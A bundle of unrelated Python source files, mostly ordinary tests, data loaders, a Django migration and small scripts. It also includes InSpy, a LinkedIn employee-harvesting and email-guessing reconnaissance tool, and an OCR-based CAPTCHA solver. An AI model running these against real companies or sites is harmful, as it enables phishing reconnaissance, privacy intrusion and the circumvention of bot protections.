logtable['exptime'].info.format = 'g'
outfile = open(outfilename, 'w')
for row in logtable.pformat_all():
outfile.write(row+os.linesep)
outfile.close()
def reduce_rawdata():
"""2D to 1D pipeline for FEROS.
"""
# read obslog and config
config = load_config('FEROS\S*\.cfg$')
logtable = load_obslog('\S*\.obslog$', fmt='astropy')
reduce_feros(config, logtable)
|
#!/usr/bin/env python
'''
test_brozzling.py - XXX explain
Copyright (C) 2016-2018 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import pytest
import brozzler
import logging
import os
import http.server
import threading
import argparse
import urllib
import json
import threading
import socket
args = argparse.Namespace()
args.log_level = logging.INFO
brozzler.cli.configure_logging(args)
WARCPROX_META_420 = {
'stats': {
'test_limits_bucket': {
'total': {'urls': 0, 'wire_bytes': 0},
'new': {'urls': 0, 'wire_bytes': 0},
'revisit': {'urls': 0, 'wire_bytes': 0},
'bucket': 'test_limits_bucket'
}
},
'reached-limit': {'test_limits_bucket/total/urls': 0}
}
@pytest.fixture(scope='module')
def httpd(request):
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self.extensions_map['.mpd'] = 'video/vnd.mpeg.dash.mpd'
http.server.SimpleHTTPRequestHandler.__init__(self, *args, **kwargs)
def do_GET(self):
if self.path == '/420':
self.send_response(420, 'Reached limit')
self.send_header('Connection', 'close')
self.send_header('Warcprox-Meta', json.dumps(WARCPROX_META_420))
payload = b'request rejected by warcprox: reached limit test_limits_bucket/total/urls=0\n'
self.send_header('Content-Type', 'text/plain;charset=utf-8')
self.send_header('Content-Length', len(payload))
self.end_headers()
self.wfile.write(payload)
elif self.path == '/401':
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(self.headers.getheader('Authorization'))
self.wfile.write('not authenticated')
else:
super().do_GET()
# SimpleHTTPRequestHandler always uses CWD so we have to chdir
os.chdir(os.path.join(os.path.dirname(__file__), 'htdocs'))
httpd = http.server.HTTPServer(('localhost', 0), RequestHandler)
httpd_thread = threading.Thread(name='httpd', target=httpd.serve_forever)
httpd_thread.start()
def fin():
httpd.shutdown()
httpd.server_close()
httpd_thread.join()
request.addfinalizer(fin)
return httpd
def test_httpd(httpd):
'''
Tests that our http server is working as expected, and that two fetches
of the same url return the same payload, proving it can be used to test
deduplication.
'''
payload1 = content2 = None
url = 'http://localhost:%s/site1/file1.txt' % httpd.server_port
with urllib.request.urlopen(url) as response:
assert response.status == 200
payload1 = response.read()
assert payload1
with urllib.request.urlopen(url) as response:
assert response.status == 200
payload2 = response.read()
assert payload2
assert payload1 == payload2
url = 'http://localhost:%s/420' % httpd.server_port
with pytest.raises(urllib.error.HTTPError) as excinfo:
urllib.request.urlopen(url)
assert excinfo.value.getcode() == 420
def test_aw_snap_hes_dead_jim():
chrome_exe = brozzler.suggest_default_chrome_exe()
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.BrowsingException):
browser.browse_page('chrome://crash')
def test_page_interstitial_exception(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/401' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.PageInterstitialShown):
browser.browse_page(url)
def test_on_response(httpd):
response_urls = []
def on_response(msg):
response_urls.append(msg['params']['response']['url'])
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/site3/page.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
browser.browse_page(url, on_response=on_response)
assert response_urls[0] == 'http://localhost:%s/site3/page.html' % httpd.server_port
assert response_urls[1] == 'http://localhost:%s/site3/brozzler.svg' % httpd.server_port
assert response_urls[2] == 'http://localhost:%s/favicon.ico' % httpd.server_port
def test_420(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/420' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.ReachedLimit) as excinfo:
browser.browse_page(url)
assert excinfo.value.warcprox_meta == WARCPROX_META_420
def test_js_dialogs(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
url = 'http://localhost:%s/site4/alert.html' % httpd.server_port
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
# before commit d2ed6b97a24 these would hang and eventually raise
# brozzler.browser.BrowsingTimeout, which would cause this test to fail
browser.browse_page(
'http://localhost:%s/site4/alert.html' % httpd.server_port)
browser.browse_page(
'http://localhost:%s/site4/confirm.html' % httpd.server_port)
browser.browse_page(
'http://localhost:%s/site4/prompt.html' % httpd.server_port)
# XXX print dialog unresolved
# browser.browse_page(
# 'http://localhost:%s/site4/print.html' % httpd.server_port)
def test_page_videos(httpd):
# test depends on behavior of youtube-dl and chromium, could fail and need
# to be adjusted on youtube-dl or chromium updates
chrome_exe = brozzler.suggest_default_chrome_exe()
worker = brozzler.BrozzlerWorker(None)
site = brozzler.Site(None, {})
page = brozzler.Page(None, {
'url':'http://localhost:%s/site6/' % httpd.server_port})
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
worker.brozzle_page(browser, site, page)
assert page.videos
assert len(page.videos) == 4
assert page.videos[0] == {
'blame': 'youtube-dl',
'response_code': 200,
'content-length': 383631,
'content-type': 'video/mp4',
'url': 'http://localhost:%s/site6/small.mp4' % httpd.server_port,
}
assert page.videos[1] == {
'blame': 'youtube-dl',
'content-length': 92728,
'content-type': 'video/webm',
'response_code': 200,
'url': 'http://localhost:%s/site6/small-video_280x160_100k.webm' % httpd.server_port
}
assert page.videos[2] == {
'blame': 'youtube-dl',
'content-length': 101114,
'content-type': 'video/webm',
'response_code': 200,
'url': 'http://localhost:%s/site6/small-audio.webm' % httpd.server_port
}
assert page.videos[3] == {
'blame': 'browser',
# 'response_code': 206,
# 'content-range': 'bytes 0-229454/229455',
'response_code': 200,
'content-length': 229455,
'content-type': 'video/webm',
'url': 'http://localhost:%s/site6/small.webm' % httpd.server_port,
}
def test_extract_outlinks(httpd):
chrome_exe = brozzler.suggest_default_chrome_exe()
worker = brozzler.BrozzlerWorker(None)
site = brozzler.Site(None, {})
page = brozzler.Page(None, {
'url':'http://localhost:%s/site8/' % httpd.server_port})
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
outlinks = worker.brozzle_page(browser, site, page)
assert outlinks == {
'http://example.com/offsite',
'http://localhost:%s/site8/baz/zuh' % httpd.server_port,
'http://localhost:%s/site8/fdjisapofdjisap#1' % httpd.server_port,
'http://localhost:%s/site8/fdjisapofdjisap#2' % httpd.server_port
}
def test_proxy_down():
'''
Test that browsing raises `brozzler.ProxyError` when proxy is down.
See also `test_proxy_down` in test_units.py.
Tests two different kinds of connection error:
- nothing listening the port (nobody listens on on port 4 :))
- port bound but not accepting connections
'''
sock = socket.socket()
sock.bind(('127.0.0.1', 0))
for not_listening_proxy in (
'127.0.0.1:4', '127.0.0.1:%s' % sock.getsockname()[1]):
site = brozzler.Site(None, {'seed':'http://example.com/'})
page = brozzler.Page(None, {'url': 'http://example.com/'})
worker = brozzler.BrozzlerWorker(
frontier=None, proxy=not_listening_proxy)
chrome_exe = brozzler.suggest_default_chrome_exe()
with brozzler.Browser(chrome_exe=chrome_exe) as browser:
with pytest.raises(brozzler.ProxyError):
worker.brozzle_page(browser, site, page)
|
import pytest
from keras.datasets import mnist
import numpy as np
@pytest.fixture
def mnist_dataset():
(X_train, _), (X_test, _) = mnist.load_data()
X_train = X_train.astype('float32') / 256.
X_test = X_test.astype('float32') / 256.
X_train = X_train.reshape((len(X_train), np.prod(X_train.shape[1:])))
X_test = X_test.reshape((len(X_test), np.prod(X_test.shape[1:])))
return X_train, X_test
|
# Generated by Django 2.2.7 on 2019-12-19 14:25
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('employees', '0024_auto_20171229_1156'),
]
operations = [
migrations.AddField(
model_name='userdata',
name='billable_expectation',
field=models.DecimalField(decimal_places=2, default=0.8, max_digits=3, validators=[django.core.validators.MaxValueValidator(limit_value=1)], verbose_name='Percentage of hours which are expected to be billable each week'),
),
]
|
from flask.globals import current_app
from infosystem.celery import celery, decide_on_run
from infosystem.common import exception
from infosystem.subsystem.user.email import TypeEmail
@decide_on_run
@celery.task(autoretry_for=(exception.NotFound,),
default_retry_delay=5,
retry_kwargs={'max_retries': 3})
def send_email(user_id: str) -> None:
api = current_app.api_handler.api()
users_manager = api.users()
return users_manager.notify(id=user_id,
type_email=TypeEmail.ACTIVATE_ACCOUNT)
|
import os
import pytesseract
import logging
from PIL import Image
LOGGER = logging.getLogger(__name__)
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
# Get CAPTCHA image & extract text
class CaptchaHandler:
def __init__(self):
self.filename = 'solved_captcha.png'
def get_captcha(self, driver, element):
LOGGER.info("Getting captcha")
# now that we have the preliminary stuff out of the way time to get that image :D
location = element.location
size = element.size
# saves screenshot of entire page
driver.save_screenshot(os.path.join(__location__,self.filename))
# uses PIL library to open image in memory
image = Image.open(os.path.join(__location__,self.filename))
left = location['x']
top = location['y']
right = location['x'] + size['width']
bottom = location['y'] + size['height']
image = image.crop((left, top, right, bottom)) # defines crop points
image.save(os.path.join(__location__,self.filename), 'png') # saves new cropped image
return self.solve_captcha(os.path.join(__location__,self.filename))
@staticmethod
def solve_captcha(img_path):
try:
LOGGER.info("Solving captcha")
solution = pytesseract.image_to_string(Image.open(img_path))
os.remove(img_path) # Remove the file after solving
return solution
except FileNotFoundError:
return
|
#!/usr/bin/env python2
# Copyright (c) 2016 Jonathan Broche (@g0jhonny)
from lib.logger import *
from lib.soupify import *
from lib.workbench import *
from lib.crawler import *
import os, argparse, sys, time
parser = argparse.ArgumentParser(description='InSpy - A LinkedIn enumeration tool by Jonathan Broche (@g0jhonny)', version="2.0.2")
parser.add_argument('company', help="Company name to use for tasks.")
techgroup = parser.add_argument_group(title="Technology Search")
techgroup.add_argument('--techspy', metavar='file', const="wordlists/tech-list-small.txt", nargs='?', help="Crawl LinkedIn job listings for technologies used by the company. Technologies imported from a new line delimited file. [Default: tech-list-small.txt]")
techgroup.add_argument('--limit', metavar='int', type=int, default=50, help="Limit the number of job listings to crawl. [Default: 50]")
empgroup = parser.add_argument_group(title="Employee Harvesting")
empgroup.add_argument('--empspy', metavar='file', const="wordlists/title-list-small.txt", nargs='?', help="Discover employees by title and/or department. Titles and departments are imported from a new line delimited file. [Default: title-list-small.txt]")
empgroup.add_argument('--emailformat', metavar='string', help="Create email addresses for discovered employees using a known format. [Accepted Formats: first.last@xyz.com, last.first@xyz.com, firstl@xyz.com, lfirst@xyz.com, flast@xyz.com, lastf@xyz.com, first@xyz.com, last@xyz.com]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--html', metavar='file', help="Print results in HTML file.")
outgroup.add_argument('--csv', metavar='file', help="Print results in CSV format.")
outgroup.add_argument('--json', metavar='file', help="Print results in JSON.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
start_logger(args.company)
print "\nInSpy {}\n".format(parser.version)
if not args.techspy and not args.empspy:
print "You didn't provide any work for me to do."
sys.exit(1)
stime = time.time()
tech_html, employee_html, tech_csv, employee_csv, tech_json, employee_json = [], [], [], [], [], []
if args.techspy:
if os.path.exists(os.path.abspath(args.techspy)):
initial_crawl = crawl_jobs(args.company)
if initial_crawl:
soup = soupify(initial_crawl)
job_links = []
for link in get_job_links(soup, args.company):
if len(job_links) < args.limit:
job_links.append(link)
if len(job_links) != args.limit:
page_links = get_page_links(soup)
for page in range(len(page_links)):
if len(job_links) == args.limit: break
urlcrawl = crawl_url(page_links[page])
if urlcrawl:
for link in get_job_links(soupify(urlcrawl), args.company):
if len(job_links) < args.limit:
job_links.append(link)
pstatus("{} Jobs identified".format(len(job_links)))
if job_links:
techs = {}
for job in range(len(job_links)):
jobresponse = crawl_url(job_links[job])
if jobresponse:
jobsoup = soupify(jobresponse)
description = get_job_description(jobsoup)
matches = identify_tech(description, os.path.abspath(args.techspy))
if matches:
title = get_job_title(jobsoup)
techs[title] = {job_links[job]:matches}
tech_html, tech_csv, tech_json = craft_tech(techs)
else:
perror("No such file or directory: '{}'".format(args.techspy))
if args.empspy:
if os.path.exists(os.path.abspath(args.empspy)):
employees = {}
emails = []
for response in crawl_employees(args.company, os.path.abspath(args.empspy)):
for name, title in get_employees(soupify(response)).items():
if args.company.lower() in title.lower():
if not name in employees:
employees[name] = title
pstatus("{} Employees identified".format(len(employees.keys())))
if employees:
if args.emailformat:
if args.emailformat[:args.emailformat.find('@')] in ['first.last', 'last.first', 'firstlast', 'lastfirst', 'first_last', 'last_first', 'first', 'last', 'firstl', 'lfirst', 'flast', 'lastf']:
employee_html, employee_csv, employee_json = craft_employees(employees, args.emailformat)
else:
pwarning("You didn't provide a valid e-mail format. See help (-h) for acceptable formats.")
employee_html, employee_csv, employee_json = craft_employees(employees, None)
else:
employee_html, employee_csv, employee_json = craft_employees(employees, None)
else:
print os.path.abspath(args.empspy)
perror("No such file or directory: '{}'".format(args.empspy))
#output
if args.html:
if tech_html or employee_html:
if tech_html and employee_html:
craft_html(args.company, tech_html, employee_html, args.html)
elif tech_html and not employee_html:
craft_html(args.company, tech_html, None, args.html)
else:
craft_html(args.company, None, employee_html, args.html)
if args.csv:
if tech_csv or employee_csv:
if tech_csv and employee_csv:
craft_csv(tech_csv, employee_csv, args.csv)
elif tech_csv and not employee_csv:
craft_csv(tech_csv, None, args.csv)
else:
craft_csv(None, employee_csv, args.csv)
if args.json:
if tech_json or employee_json:
if tech_json and employee_json:
craft_json(tech_json, employee_json, args.json)
elif tech_json and not employee_json:
craft_json(tech_json, None, args.json)
else:
craft_json(None, employee_json, args.json)
print "Completed in {:.1f}s".format(time.time()-stime) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: MIT
# Copyright (C) 2020-2021 Mobica Limited
"""Create team file basing on specified project members"""
# Standard library imports
import sys
import json
# Third party imports
import jsonschema
# Project imports
import cjm
import cjm.cfg
import cjm.codes
import cjm.request
import cjm.run
import cjm.schema
_PROJECT_KEY_ARG_NAME = "--project-key"
_DEFAULT_DAILY_CAPACITY = 2
def request_users(cfg):
"""Retrieve list of project members"""
users = []
user_data_url = cjm.request.make_cj_url(cfg, "user", "search", "query")
user_query = "is assignee of {0:s}".format(cfg["project"]["key"])
start_at = 0
max_results = 50
while True:
response = cjm.request.make_cj_request(
cfg, user_data_url,
{"query": user_query, "startAt": start_at, "maxResults": max_results})
response_json = response.json()
users += response_json["values"]
start_at += max_results
if start_at >= response_json["total"]:
break
return users
def main(options, defaults):
"""Entry function"""
cfg = cjm.cfg.apply_options(cjm.cfg.apply_config(cjm.cfg.init_defaults(), defaults), options)
cfg["project"]["key"] = options.project_key
if cfg["project"]["key"] is None:
sys.stderr.write(
"ERROR: The project key is not specified. Use the '{0:s}' CLI option or the defaults"
" file to specify it".format(_PROJECT_KEY_ARG_NAME))
return cjm.codes.CONFIGURATION_ERROR
users_active = [u for u in request_users(cfg) if u["active"]]
users = []
for user in users_active:
if str(user["displayName"]).find(' ') != -1:
firstname, lastname = str(user["displayName"]).split(" ", 1)
elif str(user["displayName"]).find('.') != -1:
firstname, lastname = str(user["displayName"]).split(".", 1)
elif str(user["displayName"]).find(',') != -1:
firstname, lastname = str(user["displayName"]).split(",", 1)
else:
firstname = user["displayName"]
lastname = "PLEASE-FILL"
data = {
"code": str(firstname[0] + lastname[0]).upper(),
"last name": lastname,
"first name": firstname,
"account id": user["accountId"],
"daily capacity": options.daily_capacity
}
users.append(data)
make_codes_unique(users)
people = {"people": users}
print(json.dumps(people, indent=4, separators=(',', ': ')))
jsonschema.validate(people, cjm.schema.load(cfg, "team.json"))
if options.json_output:
print(json.dumps(people, indent=4, sort_keys=False))
return cjm.codes.NO_ERROR
def make_codes_unique(users):
"""Ensure that user codes are unique by adding unique index postfix to all the duplicates"""
codes = [user["code"] for user in users]
unique_codes = []
for idx, code in enumerate(codes):
total = codes.count(code)
count = codes[:idx].count(code)
unique_codes.append("{0:s}{1:d}".format(code, count + 1) if total > 1 else code)
for idx, user in enumerate(users):
user["code"] = unique_codes[idx]
def parse_options(args, defaults):
"""Parse command line options"""
parser = cjm.cfg.make_common_parser(defaults)
default_project_key = defaults.get("project", {}).get("key")
parser.add_argument(
_PROJECT_KEY_ARG_NAME, action="store", metavar="KEY", dest="project_key",
default=default_project_key,
help=(
"Project for which the team will be associated{0:s}"
"".format(cjm.cfg.fmt_dft(default_project_key))))
parser.add_argument(
"--daily_capacity", action="store", default=_DEFAULT_DAILY_CAPACITY,
dest="daily_capacity",
help=("Change default daily capacity for every team member"
f"current default: {_DEFAULT_DAILY_CAPACITY }"))
return parser.parse_args(args)
if __name__ == "__main__":
cjm.run.run_2(main, parse_options)
|
#!/usr/bin/env python
import unittest
from pymodbus.compat import IS_PYTHON3
if IS_PYTHON3:
from unittest.mock import patch, Mock
else: # Python 2
from mock import patch, Mock
from pymodbus.client.async.twisted import (
ModbusClientProtocol, ModbusUdpClientProtocol, ModbusSerClientProtocol, ModbusTcpClientProtocol
)
from pymodbus.factory import ClientDecoder
from pymodbus.client.async.twisted import ModbusClientFactory
from pymodbus.exceptions import ConnectionException
from pymodbus.transaction import ModbusSocketFramer, ModbusRtuFramer
from pymodbus.bit_read_message import ReadCoilsRequest, ReadCoilsResponse
#---------------------------------------------------------------------------#
# Fixture
#---------------------------------------------------------------------------#
class AsynchronousClientTest(unittest.TestCase):
'''
This is the unittest for the pymodbus.client.async module
'''
#-----------------------------------------------------------------------#
# Test Client Protocol
#-----------------------------------------------------------------------#
def testClientProtocolInit(self):
''' Test the client protocol initialize '''
protocol = ModbusClientProtocol()
self.assertEqual(0, len(list(protocol.transaction)))
self.assertFalse(protocol._connected)
self.assertTrue(isinstance(protocol.framer, ModbusSocketFramer))
framer = object()
protocol = ModbusClientProtocol(framer=framer)
self.assertEqual(0, len(list(protocol.transaction)))
self.assertFalse(protocol._connected)
self.assertTrue(framer is protocol.framer)
def testClientProtocolConnect(self):
''' Test the client protocol connect '''
decoder = object()
framer = ModbusSocketFramer(decoder)
protocol = ModbusClientProtocol(framer=framer)
self.assertFalse(protocol._connected)
protocol.connectionMade()
self.assertTrue(protocol._connected)
def testClientProtocolDisconnect(self):
''' Test the client protocol disconnect '''
protocol = ModbusClientProtocol()
protocol.connectionMade()
def handle_failure(failure):
self.assertTrue(isinstance(failure.value, ConnectionException))
d = protocol._buildResponse(0x00)
d.addErrback(handle_failure)
self.assertTrue(protocol._connected)
protocol.connectionLost('because')
self.assertFalse(protocol._connected)
def testClientProtocolDataReceived(self):
''' Test the client protocol data received '''
protocol = ModbusClientProtocol(ModbusSocketFramer(ClientDecoder()))
protocol.connectionMade()
out = []
data = b'\x00\x00\x12\x34\x00\x06\xff\x01\x01\x02\x00\x04'
# setup existing request
d = protocol._buildResponse(0x00)
d.addCallback(lambda v: out.append(v))
protocol.dataReceived(data)
self.assertTrue(isinstance(out[0], ReadCoilsResponse))
def testClientProtocolExecute(self):
''' Test the client protocol execute method '''
framer = ModbusSocketFramer(None)
protocol = ModbusClientProtocol(framer=framer)
protocol.connectionMade()
protocol.transport = Mock()
protocol.transport.write = Mock()
request = ReadCoilsRequest(1, 1)
d = protocol.execute(request)
tid = request.transaction_id
self.assertEqual(d, protocol.transaction.getTransaction(tid))
def testClientProtocolHandleResponse(self):
''' Test the client protocol handles responses '''
protocol = ModbusClientProtocol()
protocol.connectionMade()
out = []
reply = ReadCoilsRequest(1, 1)
reply.transaction_id = 0x00
# handle skipped cases
protocol._handleResponse(None)
protocol._handleResponse(reply)
# handle existing cases
d = protocol._buildResponse(0x00)
d.addCallback(lambda v: out.append(v))
protocol._handleResponse(reply)
self.assertEqual(out[0], reply)
def testClientProtocolBuildResponse(self):
''' Test the udp client protocol builds responses '''
protocol = ModbusClientProtocol()
self.assertEqual(0, len(list(protocol.transaction)))
def handle_failure(failure):
self.assertTrue(isinstance(failure.value, ConnectionException))
d = protocol._buildResponse(0x00)
d.addErrback(handle_failure)
self.assertEqual(0, len(list(protocol.transaction)))
protocol._connected = True
d = protocol._buildResponse(0x00)
self.assertEqual(1, len(list(protocol.transaction)))
#-----------------------------------------------------------------------#
# Test TCP Client Protocol
#-----------------------------------------------------------------------#
def testTcpClientProtocolInit(self):
''' Test the udp client protocol initialize '''
protocol = ModbusTcpClientProtocol()
self.assertEqual(0, len(list(protocol.transaction)))
self.assertTrue(isinstance(protocol.framer, ModbusSocketFramer))
framer = object()
protocol = ModbusClientProtocol(framer=framer)
self.assertTrue(framer is protocol.framer)
#-----------------------------------------------------------------------#
# Test Serial Client Protocol
#-----------------------------------------------------------------------#
def testSerialClientProtocolInit(self):
''' Test the udp client protocol initialize '''
protocol = ModbusSerClientProtocol()
self.assertEqual(0, len(list(protocol.transaction)))
self.assertTrue(isinstance(protocol.framer, ModbusRtuFramer))
framer = object()
protocol = ModbusClientProtocol(framer=framer)
self.assertTrue(framer is protocol.framer)
#-----------------------------------------------------------------------#
# Test Udp Client Protocol
#-----------------------------------------------------------------------#
def testUdpClientProtocolInit(self):
''' Test the udp client protocol initialize '''
protocol = ModbusUdpClientProtocol()
self.assertEqual(0, len(list(protocol.transaction)))
self.assertTrue(isinstance(protocol.framer, ModbusSocketFramer))
framer = object()
protocol = ModbusClientProtocol(framer=framer)
self.assertTrue(framer is protocol.framer)
def testUdpClientProtocolDataReceived(self):
''' Test the udp client protocol data received '''
protocol = ModbusUdpClientProtocol()
out = []
data = b'\x00\x00\x12\x34\x00\x06\xff\x01\x01\x02\x00\x04'
server = ('127.0.0.1', 12345)
# setup existing request
d = protocol._buildResponse(0x00)
d.addCallback(lambda v: out.append(v))
protocol.datagramReceived(data, server)
self.assertTrue(isinstance(out[0], ReadCoilsResponse))
def testUdpClientProtocolExecute(self):
''' Test the udp client protocol execute method '''
protocol = ModbusUdpClientProtocol()
protocol.transport = Mock()
protocol.transport.write = Mock()
request = ReadCoilsRequest(1, 1)
d = protocol.execute(request)
tid = request.transaction_id
self.assertEqual(d, protocol.transaction.getTransaction(tid))
def testUdpClientProtocolHandleResponse(self):
''' Test the udp client protocol handles responses '''
protocol = ModbusUdpClientProtocol()
out = []
reply = ReadCoilsRequest(1, 1)
reply.transaction_id = 0x00
# handle skipped cases
protocol._handleResponse(None)
protocol._handleResponse(reply)
# handle existing cases
d = protocol._buildResponse(0x00)
d.addCallback(lambda v: out.append(v))
protocol._handleResponse(reply)
self.assertEqual(out[0], reply)
def testUdpClientProtocolBuildResponse(self):
''' Test the udp client protocol builds responses '''
protocol = ModbusUdpClientProtocol()
self.assertEqual(0, len(list(protocol.transaction)))
d = protocol._buildResponse(0x00)
self.assertEqual(1, len(list(protocol.transaction)))
#-----------------------------------------------------------------------#
# Test Client Factories
#-----------------------------------------------------------------------#
def testModbusClientFactory(self):
''' Test the base class for all the clients '''
factory = ModbusClientFactory()
self.assertTrue(factory is not None)
#---------------------------------------------------------------------------#
# Main
#---------------------------------------------------------------------------#
if __name__ == "__main__":
unittest.main()
|
import pandas as pd
from sklearn.model_selection import train_test_split
FEATURES = ["lepton_pT", "lepton_eta",
"lepton phi", "missing_energy_magnitude",
"missing_energy_phi", "jet_1_pt", "jet_1_eta",
"jet_1_phi", "jet_1_btag", "jet_2_pt", "jet_2_eta",
"jet_2_phi", "jet_2_btag", "jet_3_pt",
"jet_3_eta", "jet_3_phi", "jet_3_btag",
"jet_4_pt", "jet_4_eta", "jet_4_phi",
"jet_4_btag", "m_jj", "m_jjj", "m_lv",
"m_jlv", "m_bb", "m_wbb", "m_wwbb"]
def load_uci_higgs(file_name, train_test_split_seed=None):
data_full = pd.read_csv(file_name, names=["label"] + FEATURES, header=None)
train, test = train_test_split(data_full, test_size=0.2, shuffle=True,
random_state=train_test_split_seed,
stratify=data_full.label)
return train, test
|
import io
import json
import pytest
from rubrik_polaris.rubrik_polaris import PolarisClient
BASE_URL = "https://rubrik-se-beta.my.rubrik.com/api"
def util_load_json(path: str) -> dict:
"""Load a json to python dict."""
with io.open(path, mode='r', encoding='utf-8') as f:
return json.loads(f.read())
@pytest.fixture()
def client(requests_mock):
data = {
"access_token": "dummy",
"mfa_token": "dummy_token"
}
requests_mock.post(BASE_URL + "/session", json=data)
client_obj = PolarisClient(
domain="rubrik-se-beta",
username="dummy_username",
password="dummy_password",
insecure=True
)
return client_obj
|
import torch
__author__ = 'Andres'
def calc_gradient_penalty_bayes(discriminator, real_data, fake_data, gamma):
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
batch_size = real_data.size()[0]
alpha = torch.rand(batch_size, 1, 1, 1)
alpha = alpha.expand(real_data.size()).to(device)
interpolates = alpha * real_data + ((1 - alpha) * fake_data)
interpolates = torch.autograd.Variable(interpolates, requires_grad=True).to(device)
disc_interpolates = discriminator(interpolates)
gradients = torch.autograd.grad(outputs=disc_interpolates, inputs=interpolates,
grad_outputs=torch.ones(disc_interpolates.size()).to(device),
create_graph=True, retain_graph=True, only_inputs=True)[0]
gradient_penalty = ((gradients.norm(2) - 1) ** 2) * gamma
return gradient_penalty |
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
# 1 column layout
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
column1 = dbc.Col(
[
dcc.Markdown(
"""
# Process
Our team had four days to create a model that can take a user's input (in this case, medical cannabis preferences)
and output the strain(s) that best match, as well as create a website for hosting our creation.
### Natural Language Processing:
Machines cannot analyze raw text on their own, so we performed tokenization which is a task in Natural Language Processing (NLP).
This method allows us to convert columns that are just text (descriptions of
effects, ailments, taste) into numeric values that can be used for machine learning.
"""
),
html.Img(src='assets/nearest_neighbor_ex.png',
title="nearest neighbor example, image from wiki",
style={'display':'block',
'width':'40%',
'margin':'auto'})
],
style={'margin':'20px'},
)
column2 = dbc.Row(
[
dcc.Markdown(
"""
### Nearest Neighbor:
Our team decided the best model to use for the task was the "k-nearest neighbors" algorithm. K-nearest neighbors
puts all the data
you're looking for onto a plane, with the recommendation you are searching for as points (in this case, the names of
medicinal cannabis strains). For an example, if you want a hybrid strain known for helping to cure insomnia,
with an earthy flavor, there might not be a recommendation that is spot on, so with k-nearest neighbors, our model will
find a point that is between the closest spreads of points, and pick the one with the most points
in that area to output a recommendation.
In the diagram above, we are trying to classify the green circle.
Within the inner circle, there are two red triangles and one blue square.
K-nearest neighbors would classify the green circle as similar to the red
triangle.
"""
),
],
style={'margin':'20px'},
)
column3 = dbc.Row(
[
dcc.Markdown(
"""
### Google API:
For a stretch goal, our team decided to add a Locate page that would show the dispensaries nearest
to a user's location. We decided on using Google Maps API for this task. When someone is
using our webpage, they can refer to the Locate tab to find the closest dispensary near them.
"""
),
],
style={'margin':'20px'},
)
img = html.Img(src='assets/pipe_left_crop.jpeg',
title="18th century pipe, images courtesy of metmuseum.org",
style={'width':'99%',
'display':'block',
'margin':'20px'})
layout = dbc.Row([column1, column2, column3, img]) |
import hashlib
with open('data/day4.txt') as f:
data = f.read()
number = 1
md5_hash = hashlib.md5(data + str(number))
while md5_hash.hexdigest()[0:6] != '000000':
number += 1
print number
md5_hash = hashlib.md5(data + str(number))
print 'Solution: {0}'.format(number)
|
def prime(num):
flag = 0
counter = 2
while counter <=(num**0.5):
if num % counter== 0:
break
counter +=1
else:
return True
def sum_of_primes(num):
sum1 = 0
for i in range(2,num):
if prime(i):
sum1+=i
return sum1
a = sum_of_primes(2000000)
print(a)
|
import warnings
import unittest
from itertools import product
import random
import torch
from torch.testing._internal.common_utils import \
(TestCase, run_tests, do_test_empty_full, TEST_NUMPY, suppress_warnings,
IS_WINDOWS, torch_to_numpy_dtype_dict, slowTest)
from torch.testing._internal.common_device_type import \
(instantiate_device_type_tests, deviceCountAtLeast, onlyOnCPUAndCUDA,
onlyCPU, skipCUDAIfNotRocm, largeCUDATensorTest, precisionOverride, dtypes,
onlyCUDA, skipCPUIf, dtypesIfCUDA)
if TEST_NUMPY:
import numpy as np
# Test suite for tensor creation ops
#
# Includes creation functions like torch.eye, random creation functions like
# torch.rand, and *like functions like torch.ones_like.
# DOES NOT INCLUDE view ops, which are tested in TestViewOps (currently in
# test_torch.py) OR numpy interop (which is also still tested in test_torch.py)
#
# See https://pytorch.org/docs/master/torch.html#creation-ops
class TestTensorCreation(TestCase):
exact_dtype = True
# TODO: this test should be updated
@onlyOnCPUAndCUDA
def test_empty_full(self, device):
torch_device = torch.device(device)
device_type = torch_device.type
if device_type == 'cpu':
do_test_empty_full(self, torch.testing.get_all_math_dtypes('cpu'), torch.strided, torch_device)
if device_type == 'cuda':
do_test_empty_full(self, torch.testing.get_all_math_dtypes('cpu'), torch.strided, None)
do_test_empty_full(self, torch.testing.get_all_math_dtypes('cpu'), torch.strided, torch_device)
# TODO: this test should be updated
@suppress_warnings
@onlyOnCPUAndCUDA
@deviceCountAtLeast(1)
def test_tensor_device(self, devices):
device_type = torch.device(devices[0]).type
if device_type == 'cpu':
self.assertEqual('cpu', torch.tensor(5).device.type)
self.assertEqual('cpu',
torch.ones((2, 3), dtype=torch.float32, device='cpu').device.type)
self.assertEqual('cpu',
torch.ones((2, 3), dtype=torch.float32, device='cpu:0').device.type)
